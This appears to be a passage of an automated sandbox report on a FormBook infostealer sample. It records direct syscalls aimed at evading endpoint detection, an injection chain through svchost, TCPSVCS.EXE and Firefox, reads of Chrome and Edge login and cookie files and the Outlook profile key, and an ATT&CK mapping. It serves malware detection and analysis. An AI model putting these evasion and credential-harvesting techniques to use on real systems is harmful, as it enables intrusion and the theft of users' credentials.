                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]2_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]2_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]2_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]2_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]2_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]2_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]2_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]2_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]2_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]2_2_03804940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]2_2_03760854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]2_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0038A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0038A66C
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003781AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003781AC
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00378189 SetUnhandledExceptionFilter,0_2_00378189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\TCPSVCS.EXE protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: NULL target: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: NULL target: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEThread register set: target process: 8056Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEThread APC queued: target process: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B2F008Jump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0038B106 LogonUserW,0_2_0038B106
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00353D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00353D19
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039411C SendInput,keybd_event,0_2_0039411C
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003974BB mouse_event,0_2_003974BB
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\xaqnaB0rcW.exe"Jump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeProcess created: C:\Windows\SysWOW64\TCPSVCS.EXE "C:\Windows\SysWOW64\TCPSVCS.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0038A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0038A66C
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003971FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003971FA
                Source: xaqnaB0rcW.exe, HSxcaEmiOTH.exe, 00000004.00000000.1563861446.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601975211.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602011637.0000000001771000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: HSxcaEmiOTH.exe, 00000004.00000000.1563861446.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601975211.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602011637.0000000001771000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: HSxcaEmiOTH.exe, 00000004.00000000.1563861446.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601975211.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602011637.0000000001771000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: xaqnaB0rcW.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: HSxcaEmiOTH.exe, 00000004.00000000.1563861446.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601975211.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602011637.0000000001771000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003765C4 cpuid 0_2_003765C4
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_003A091D
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003CB340 GetUserNameW,0_2_003CB340
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00381E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00381E8E
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0036DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0036DDC0
                Source: xaqnaB0rcW.exe, 00000000.00000003.1338506209.0000000001028000.00000004.00000020.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000002.1351052607.000000000109F000.00000004.00000020.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000003.1338600645.000000000109F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2604361912.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2601035129.00000000006A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2602376251.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658897103.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658225987.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2600811626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2602361204.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658953431.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: xaqnaB0rcW.exeBinary or memory string: WIN_81
                Source: xaqnaB0rcW.exeBinary or memory string: WIN_XP
                Source: xaqnaB0rcW.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: xaqnaB0rcW.exeBinary or memory string: WIN_XPe
                Source: xaqnaB0rcW.exeBinary or memory string: WIN_VISTA
                Source: xaqnaB0rcW.exeBinary or memory string: WIN_7
                Source: xaqnaB0rcW.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2604361912.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2601035129.00000000006A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2602376251.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658897103.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658225987.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2600811626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2602361204.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658953431.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_003A8C4F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_003A923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		11
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model11
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets261
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
